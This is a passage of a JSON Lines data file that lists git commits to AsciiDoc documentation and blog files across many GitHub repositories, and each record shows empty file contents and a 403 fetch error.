typo\n","repos":"ninja-build\/ninja,ninja-build\/ninja,maruel\/ninja,AoD314\/ninja,maruel\/ninja,AoD314\/ninja,AoD314\/ninja,ninja-build\/ninja,ninja-build\/ninja,maruel\/ninja,maruel\/ninja,AoD314\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AoD314\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dd686075eee42641774b198c180d87ace7602c23","subject":"y2b create post JACK'S FAVORITE MOMENTS MONTAGE","message":"y2b create post JACK'S FAVORITE MOMENTS 
MONTAGE","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-23-JACKS-FAVORITE-MOMENTS-MONTAGE.adoc","new_file":"_posts\/2016-06-23-JACKS-FAVORITE-MOMENTS-MONTAGE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2140dcc04e447a13f480a0aea79b9b20fc0983d3","subject":"JSON RPC API protocol is poorly structured","message":"JSON RPC API protocol is poorly structured\n\nAdd the structure and examples.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c84239ccd992b393e4d6716233aea722b0f3e2e9","subject":"Lack of chain selection for most JSON-RPC methods","message":"Lack of chain selection for most JSON-RPC methods\n\nExpend their with additional optional parameters `chain` and `chain_id`.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3215360bd7ab04148e2f70358a1288cfaf29dca4","subject":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","message":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","repos":"jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io","old_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jtsiros\/jtsiros.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4bf1ca110733fcbf4fdafe414087f1c34eed685","subject":"Update 2017-10-06-Linux-Basics-Creating-a-Wireless-Wireless-Adapter.adoc","message":"Update 2017-10-06-Linux-Basics-Creating-a-Wireless-Wireless-Adapter.adoc","repos":"ntfnd\/ntfnd.github.io,ntfnd\/ntfnd.github.io,ntfnd\/ntfnd.github.io,ntfnd\/ntfnd.github.io","old_file":"_posts\/2017-10-06-Linux-Basics-Creating-a-Wireless-Wireless-Adapter.adoc","new_file":"_posts\/2017-10-06-Linux-Basics-Creating-a-Wireless-Wireless-Adapter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ntfnd\/ntfnd.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87ca98f0be75dcdb76329af74e3f106d71a8d2c6","subject":"Update 2017-03-14-Troubleshooting-TFS-DB-Growth.adoc","message":"Update 2017-03-14-Troubleshooting-TFS-DB-Growth.adoc","repos":"dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io","old_file":"_posts\/2017-03-14-Troubleshooting-TFS-DB-Growth.adoc","new_file":"_posts\/2017-03-14-Troubleshooting-TFS-DB-Growth.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dannylane\/dannylane.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a49fd25b21b9a2c7fb129b0430c4d89fa6082520","subject":"Update 2017-06-07-Episode-102-Trololo.adoc","message":"Update 2017-06-07-Episode-102-Trololo.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-06-07-Episode-102-Trololo.adoc","new_file":"_posts\/2017-06-07-Episode-102-Trololo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"702e270dbdaa1fd3324beb8d42a7b189025bd36b","subject":"Create JolokiaBeanMonitor.adoc","message":"Create JolokiaBeanMonitor.adoc","repos":"aihua\/opennms,tdefilip\/opennms,tdefilip\/opennms,tdefilip\/opennms,rdkgit\/opennms,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,tdefilip\/opennms,rdkgit\/opennms,aihua\/opennms,tdefilip\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/JolokiaBeanMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/JolokiaBeanMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rdkgit\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"8a829330bb610c59cc55f06a4f5e12ca0eedb5d3","subject":"fix typo","message":"fix typo\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,inserpio\/neo4j-apoc-procedures,atuljangra\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/inserpio\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9e72706347305c601a330f7389198071944b29dd","subject":"Update 2016-02-04-Alex-intime-details.adoc","message":"Update 2016-02-04-Alex-intime-details.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-04-Alex-intime-details.adoc","new_file":"_posts\/2016-02-04-Alex-intime-details.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3cebde970198eb01a5d40123581a3b030ee474a","subject":"Update 
2019-01-31-classes-and-objects.adoc","message":"Update 2019-01-31-classes-and-objects.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-classes-and-objects.adoc","new_file":"_posts\/2019-01-31-classes-and-objects.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e280ce1a3eafb9518af7147439e9f46d5d654e31","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d1cde99e16f7af1be5e64f17f469f4a1cfb58cd","subject":"I think it's finally working.","message":"I think it's finally working.\n","repos":"hypatia-software-org\/hypatia-engine,hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia,lillian-lemmer\/hypatia,Applemann\/hypatia,brechin\/hypatia,brechin\/hypatia,Applemann\/hypatia","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"256393b09b9e6ab27c924888c2fcb172e7ad82b1","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9eda4d80fcc88cf5a5adf072ff93689f845c49ab","subject":"Add basic docs on secondaries","message":"Add basic docs on secondaries\n\nChange-Id: I32a304ad568898e2c21b688e67e58e869c7fc761\n","repos":"advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr","old_file":"docs\/linux-secondaries.adoc","new_file":"docs\/linux-secondaries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"cd1d58c02b35feded1a7485309cea992ed38dfd5","subject":"Add Bakery link to the documentation.","message":"Add Bakery link to the 
documentation.\n\n","repos":"Darsstar\/framework,Darsstar\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,asashour\/framework,asashour\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,asashour\/framework","old_file":"documentation\/tutorial.adoc","new_file":"documentation\/tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e0100ea3f189e0ff56b5780d07e1dac159f57245","subject":"Update logging documentation to include Log4j 2","message":"Update logging documentation to include Log4j 2\n\nThis also updates the version numbers provided in the sample pom.xml\nsnippets for configuring logging for SLF4J and Log4j 1.x. A sample\nlog4j2.xml file is also given with the same configuration as\ndemonstrated in the log4j.properties example. The link to the Log4j 1.x\nsite has been fixed to point to the 1.2 URL (do note that Log4j 1.2 is\nend of life and is not compatible with JDK 9+).\n\nSee gh-1279\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/asciidoc\/overview.adoc","new_file":"src\/asciidoc\/overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4063c17d3f74e7015b5a68cb3b8a9cf7f61f0824","subject":"Publish 2017-02-25adoc.adoc","message":"Publish 2017-02-25adoc.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"2017-02-25adoc.adoc","new_file":"2017-02-25adoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7e1781694190e82cacc93d712271f9c221a9cb8","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74d896f355f6fa804b82e4a200aa1165ba37cb35","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheStudentsOutpost\/TheStudentsOutpost.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef8609f3560b0dcac98e4afb7be8457f0b4b781a","subject":"adder release notes for 1.21.0","message":"adder release notes for 1.21.0","repos":"appNG\/appng,appNG\/appng,appNG\/appng","old_file":"releasenotes_1.21.0.adoc","new_file":"releasenotes_1.21.0.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/appNG\/appng.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"446799e701cc11e8ade5e6f3e40190b091f70e42","subject":"Update 2015-10-07-phpconf2015_impression.adoc","message":"Update 2015-10-07-phpconf2015_impression.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2015-10-07-phpconf2015_impression.adoc","new_file":"_posts\/2015-10-07-phpconf2015_impression.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46faf4854351596f1ec02206fffa4ac0a747a71f","subject":"jpa criteria blog post","message":"jpa criteria blog post\n","repos":"codylerum\/outjected.com,codylerum\/outjected.com","old_file":"blog\/2013-08-08-embrace-the-jpa-2-criteria-api.asciidoc","new_file":"blog\/2013-08-08-embrace-the-jpa-2-criteria-api.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codylerum\/outjected.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61480665a4858aaa029dff04a789b4f574fcad14","subject":"Link to view","message":"Link to view\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Class path\/README.adoc","new_file":"Class path\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"431e458e41df4bdfd02fbc7370fc72efde7fe4e4","subject":"Create SUMMARY.adoc","message":"Create SUMMARY.adoc","repos":"NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io","old_file":"SUMMARY.adoc","new_file":"SUMMARY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"effa55cf829f17ee16e2053c21f0a4eddc4db193","subject":"Update 2015-08-28-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","message":"Update 2015-08-28-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","repos":"extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io","old_file":"_posts\/2015-08-28-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","new_file":"_posts\/2015-08-28-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/extrapolate\/extrapolate.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96d9914dc5e1ebc1f400b3cf4336fa2d63077c1e","subject":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","message":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0cf2bdf9d2de1d861bf823a58d50942e12fca663","subject":"Update 2017-07-07-Cloud-Spanner.adoc","message":"Update 2017-07-07-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f7b5b098b14630a35a27f30a9e68f3ef2efa417","subject":"Update CHANGELOG","message":"Update CHANGELOG\n","repos":"ninenines\/ranch,layerhq\/ranch,K2InformaticsGmbH\/ranch","old_file":"CHANGELOG.asciidoc","new_file":"CHANGELOG.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/K2InformaticsGmbH\/ranch.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"bdc1d7b01d91e9cc4ce7dd4a76937f2c9603d50d","subject":"postman collection updated","message":"postman collection updated\n","repos":"dsilahcilar\/spring-examples,dsilahcilar\/spring-rest","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dsilahcilar\/spring-rest.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e443bfc492ed3a07a8d22ee98fb52264ef0e39d5","subject":"docs: fix callouts","message":"docs: fix 
callouts\n","repos":"coding0011\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,episerver\/elasticsearch,gingerwizard\/elasticsearch,Helen-Zhao\/elasticsearch,davidvgalbraith\/elasticsearch,obourgain\/elasticsearch,andrejserafim\/elasticsearch,a2lin\/elasticsearch,scorpionvicky\/elasticsearch,myelin\/elasticsearch,mmaracic\/elasticsearch,nknize\/elasticsearch,markharwood\/elasticsearch,cwurm\/elasticsearch,nezirus\/elasticsearch,Stacey-Gammon\/elasticsearch,HonzaKral\/elasticsearch,cwurm\/elasticsearch,Shepard1212\/elasticsearch,IanvsPoplicola\/elasticsearch,ZTE-PaaS\/elasticsearch,njlawton\/elasticsearch,ricardocerq\/elasticsearch,LewayneNaidoo\/elasticsearch,mapr\/elasticsearch,Shepard1212\/elasticsearch,scottsom\/elasticsearch,bawse\/elasticsearch,yanjunh\/elasticsearch,gingerwizard\/elasticsearch,njlawton\/elasticsearch,glefloch\/elasticsearch,jchampion\/elasticsearch,ricardocerq\/elasticsearch,JervyShi\/elasticsearch,nomoa\/elasticsearch,andrejserafim\/elasticsearch,yynil\/elasticsearch,markwalkom\/elasticsearch,dongjoon-hyun\/elasticsearch,rlugojr\/elasticsearch,palecur\/elasticsearch,s1monw\/elasticsearch,nazarewk\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,dpursehouse\/elasticsearch,liweinan0423\/elasticsearch,artnowo\/elasticsearch,davidvgalbraith\/elasticsearch,wangtuo\/elasticsearch,elasticdog\/elasticsearch,strapdata\/elassandra,xuzha\/elasticsearch,nazarewk\/elasticsearch,gfyoung\/elasticsearch,spiegela\/elasticsearch,mikemccand\/elasticsearch,nazarewk\/elasticsearch,trangvh\/elasticsearch,maddin2016\/elasticsearch,rajanm\/elasticsearch,henakamaMSFT\/elasticsearch,henakamaMSFT\/elasticsearch,pozhidaevak\/elasticsearch,kaneshin\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,liweinan0423\/elasticsearch,clintongormley\/elasticsearch,strapdata\/elassandra5-rc,obourgain\/elasticsearch,brandonkearby\/elasticsearch,clintongormley\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,bawse\/elasticsearch,yanjunh\/elasticsearch,JervyShi\/elasticsearch,qwerty4030\/elasticsearch,JackyMai\/elasticsearch,rhoml\/elasticsearch,maddin2016\/elasticsearch,shreejay\/elasticsearch,winstonewert\/elasticsearch,qwerty4030\/elasticsearch,diendt\/elasticsearch,bawse\/elasticsearch,JSCooke\/elasticsearch,yynil\/elasticsearch,fred84\/elasticsearch,sreeramjayan\/elasticsearch,AndreKR\/elasticsearch,mmaracic\/elasticsearch,markharwood\/elasticsearch,nknize\/elasticsearch,palecur\/elasticsearch,awislowski\/elasticsearch,alexshadow007\/elasticsearch,Shepard1212\/elasticsearch,jprante\/elasticsearch,artnowo\/elasticsearch,palecur\/elasticsearch,awislowski\/elasticsearch,nilabhsagar\/elasticsearch,C-Bish\/elasticsearch,MisterAndersen\/elasticsearch,ricardocerq\/elasticsearch,rajanm\/elasticsearch,mortonsykes\/elasticsearch,gmarz\/elasticsearch,mmaracic\/elasticsearch,lks21c\/elasticsearch,IanvsPoplicola\/elasticsearch,fred84\/elasticsearch,ivansun1010\/elasticsearch,trangvh\/elasticsearch,MisterAndersen\/elasticsearch,i-am-Nathan\/elasticsearch,sreeramjayan\/elasticsearch,episerver\/elasticsearch,dpursehouse\/elasticsearch,wuranbo\/elasticsearch,geidies\/elasticsearch,F0lha\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rmuir\/elasticsearch,spiegela\/elasticsearch,kalimatas\/elasticsearch,xuzha\/elasticsearch,JackyMai\/elasticsearch,vroyer\/elassandra,gmarz\/elasticsearch,jbertouch\/elasticsearch,girirajsharma\/elasticsearch,pozhidaevak\/elasticsearch,zkidkid\/elasticsearch,fforbeck\/elasticsearch,AndreKR\/elasticsearch,jprante\/elasticsearch,obourgain\/elasticsearc
h,mohit\/elasticsearch,MaineC\/elasticsearch,scorpionvicky\/elasticsearch,yynil\/elasticsearch,JSCooke\/elasticsearch,dongjoon-hyun\/elasticsearch,gfyoung\/elasticsearch,yynil\/elasticsearch,avikurapati\/elasticsearch,markharwood\/elasticsearch,fernandozhu\/elasticsearch,artnowo\/elasticsearch,rhoml\/elasticsearch,spiegela\/elasticsearch,tebriel\/elasticsearch,masaruh\/elasticsearch,shreejay\/elasticsearch,mjason3\/elasticsearch,andrejserafim\/elasticsearch,martinstuga\/elasticsearch,ZTE-PaaS\/elasticsearch,bawse\/elasticsearch,F0lha\/elasticsearch,snikch\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,lks21c\/elasticsearch,camilojd\/elasticsearch,martinstuga\/elasticsearch,polyfractal\/elasticsearch,ivansun1010\/elasticsearch,awislowski\/elasticsearch,jimczi\/elasticsearch,wenpos\/elasticsearch,wenpos\/elasticsearch,myelin\/elasticsearch,kaneshin\/elasticsearch,nezirus\/elasticsearch,GlenRSmith\/elasticsearch,jchampion\/elasticsearch,MaineC\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,rmuir\/elasticsearch,strapdata\/elassandra5-rc,jbertouch\/elasticsearch,gmarz\/elasticsearch,myelin\/elasticsearch,dpursehouse\/elasticsearch,LeoYao\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,gingerwizard\/elasticsearch,kaneshin\/elasticsearch,strapdata\/elassandra,wangtuo\/elasticsearch,fforbeck\/elasticsearch,camilojd\/elasticsearch,mapr\/elasticsearch,JSCooke\/elasticsearch,maddin2016\/elasticsearch,MaineC\/elasticsearch,mortonsykes\/elasticsearch,pozhidaevak\/elasticsearch,wuranbo\/elasticsearch,gfyoung\/elasticsearch,nilabhsagar\/elasticsearch,C-Bish\/elasticsearch,obourgain\/elasticsearch,i-am-Nathan\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,jimczi\/elasticsearch,obourgain\/elasticsearch,andrejserafim\/elasticsearch,i-am-Nathan\/elasticsearch,henakamaMSFT\/elasticsearch,geidies\/elasticsearch,bawse\/elasticsearch,Shepard1212\/elasticsearch,geidies\/elasticsearch,diendt\/elasticsearch,Stacey-Gammon\/elasticsearch,martinstuga\/elasticsearch,myelin\/elasticsearch,MaineC\/elasticsearch,zkidkid\/elasticsearch,LeoYao\/elasticsearch,dpursehouse\/elasticsearch,sneivandt\/elasticsearch,mapr\/elasticsearch,F0lha\/elasticsearch,gfyoung\/elasticsearch,mapr\/elasticsearch,alexshadow007\/elasticsearch,cwurm\/elasticsearch,nomoa\/elasticsearch,wenpos\/elasticsearch,shreejay\/elasticsearch,coding0011\/elasticsearch,henakamaMSFT\/elasticsearch,avikurapati\/elasticsearch,kaneshin\/elasticsearch,avikurapati\/elasticsearch,StefanGor\/elasticsearch,njlawton\/elasticsearch,sreeramjayan\/elasticsearch,cwurm\/elasticsearch,davidvgalbraith\/elasticsearch,ricardocerq\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,dongjoon-hyun\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,markwalkom\/elasticsearch,glefloch\/elasticsearch,JSCooke\/elasticsearch,s1monw\/elasticsearch,LewayneNaidoo\/elasticsearch,trangvh\/elasticsearch,avikurapati\/elasticsearch,martinstuga\/elasticsearch,qwerty4030\/elasticsearch,Helen-Zhao\/elasticsearch,liweinan0423\/elasticsearch,JervyShi\/elasticsearch,shreejay\/elasticsearch,gmarz\/elasticsearch,rhoml\/elasticsearch,nezirus\/elasticsearch,nezirus\/elasticsearch,awislowski\/elasticsearch,jimczi\/elasticsearch,uschindler\/elasticsearch,AndreKR\/elasticsearch,pozhidaevak\/elasticsearch,AndreKR\/elasticsearch,maddin2016\/elasticsearch,alexshadow007\/elasticsearch,rlugojr\/elasticsearch,snikch\/elasticsearch,rhoml\/elasticsearch,xuzha\/elasticsearch,scorpionvicky\/elasticsearch,camilojd\/elasticsearch,zkidkid\/elasticsearch,mye
